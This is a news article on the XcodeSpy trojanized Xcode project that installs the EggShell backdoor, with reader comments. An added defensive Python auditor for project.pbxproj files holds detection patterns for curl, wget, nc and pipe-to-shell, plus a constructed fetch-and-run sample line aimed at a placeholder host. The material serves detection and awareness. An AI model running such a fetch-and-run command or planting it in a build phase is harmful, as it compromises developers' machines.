Security Researchers Discover XcodeSpy Malware That Targets Developers

Developers need to look out for "XcodeSpy," a malicious Xcode project that installs a custom variant of the "EggShell" backdoor on a macOS computer, according to new research shared today by SentinelOne (via Ars Technica).

Xcode is software designed for developers who want to write apps for the iOS and macOS platforms, and the malicious project that's circulating mirrors TabBarInteraction, a legitimate open source project.

Developers who download the XcodeSpy project think they're getting TabBarInteraction, but the malware includes a hidden "Run Script" executable that downloads and installs the open source EggShell backdoor, which is able to spy on users through the microphone, camera, and keyboard as well as upload and download files.

Two variants of the custom EggShell attack were found to be uploaded in Japan, first in August and then in October, so this is an attack that's been out in the wild for some time.

We have thus far been unable to discover other samples of trojanized Xcode projects and cannot gauge the extent of this activity. However, the timeline from known samples and other indicators mentioned below suggest that other XcodeSpy projects may exist. By sharing details of this campaign, we hope to raise awareness of this attack vector and highlight the fact that developers are high-value targets for attackers.

SentinelOne says that all Apple developers who use Xcode should exercise caution when using shared Xcode projects.
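
The hidden Run Script described above is stored in the project's project.pbxproj file as a PBXShellScriptBuildPhase entry, so it can be read as plain text before a shared project is opened or built in Xcode. The following added example (not from SentinelOne or the original article) lists every such phase and flags scripts that deserve a closer read; the indicator patterns and the sample project text are constructed for illustration and are not taken from XcodeSpy.

```python
import re
# Keys after "isa" are alphabetical in Xcode-written project.pbxproj files,
# so the optional "name" sits between "isa" and "shellScript".
PHASE_RE = re.compile(
    r'isa = PBXShellScriptBuildPhase;(?P<body>.*?)'
    r'shellScript = (?:"(?P<quoted>(?:[^"\\]|\\.)*)"|(?P<bare>[^;\s]+));',
    re.DOTALL)
NAME_RE = re.compile(r'\bname = "?(?P<n>[^";]*)"?;')
ESCAPES = {"n": "\n", "t": "\t"}  # any other escaped char stands for itself
# Review heuristics chosen for this example; a hit means "read this script".
INDICATORS = {
    "network fetch": re.compile(r'\b(curl|wget|nc|ncat)\b|/dev/tcp/'),
    "decode or eval": re.compile(r'\b(base64|eval|xxd)\b'),
    "pipe to interpreter": re.compile(r'\|\s*((ba|z)?sh|python3?|perl|ruby)\b'),
    "backgrounded command": re.compile(r'&\s*$', re.MULTILINE),
}

def unescape(s):
    return re.sub(r'\\(.)', lambda m: ESCAPES.get(m.group(1), m.group(1)),
                  s, flags=re.DOTALL)

def audit_pbxproj(text):
    """Return one dict per Run Script phase: name, script, matched indicators."""
    findings = []
    for m in PHASE_RE.finditer(text):
        quoted = m.group("quoted")
        script = unescape(quoted) if quoted is not None else m.group("bare")
        nm = NAME_RE.search(m.group("body"))
        hits = [label for label, rx in INDICATORS.items() if rx.search(script)]
        findings.append({"name": nm.group("n") if nm else "(unnamed)",
                         "script": script, "indicators": hits})
    return findings

# Constructed sample (not taken from XcodeSpy): one lint phase, one fetch-and-run.
SAMPLE = r'''
        AA01 /* Lint */ = {
            isa = PBXShellScriptBuildPhase;
            name = Lint;
            shellScript = "if which swiftlint >/dev/null; then\n  swiftlint\nfi\n";
        };
        AA02 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            name = "Run Script";
            shellScript = "curl -s \"https://example.invalid/setup.sh\" | sh &\n";
        };
'''

if __name__ == "__main__":
    print([(f["name"], f["indicators"]) for f in audit_pbxproj(SAMPLE)])
```

To check a downloaded project, pass the contents of the project.pbxproj file inside the .xcodeproj bundle to `audit_pbxproj` and read each returned script in full; an empty indicator list only means none of these example patterns matched.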

Tag: Xcode

Top Rated Comments

jonnysods
9 months ago
Get ready for lots of Justin Long Intel videos about this next week.
Score: 9 Votes

Apple_Robert
9 months ago

Laughing on my Linux developer laptop.
What is so funny? It's not like Linux hasn't had Malware problems.
Score: 7 Votes

I7guy
9 months ago
Comes under the heading, be very careful about what you download.
Score: 6 Votes

hot-gril
9 months ago

Why is it being called a Trojan when it has to be actively installed?
Cause that's what trojans are.
Score: 5 Votes

hot-gril
9 months ago

Comes under the heading, be very careful about what you download.
Xcode does warn you when opening an xcodeproj downloaded from the Internet, but given how frequently you legitimately have to open and build random projects, I wish there were better sandboxing. The "run script" phase runs arbitrary code, ofc necessary when building many things but also an attack vector.

Edit: And even if you're not manually opening/building projects, you're probably using Cocoapods, which is. Of course other dev platforms have similar risks.
Score: 4 Votes

Unsupported
9 months ago

Why is it being called a Trojan when it has to be actively installed?
https://usa.kaspersky.com/resource-center/threats/trojans

A Trojan horse or Trojan is a type of malware that is often disguised as legitimate software. Trojans can be employed by cyber-thieves and hackers trying to gain access to users' systems. Users are typically tricked by some form of social engineering into loading and executing Trojans on their systems. Once activated, Trojans can enable cyber-criminals to spy on you, steal your sensitive data, and gain backdoor access to your system. These actions can include:

• Deleting data
• Blocking data
• Modifying data
• Copying data
• Disrupting the performance of computers or computer networks


Modifying data?

So it could infect the project that the developer is working on?

Nasty!
Score: 3 Votes
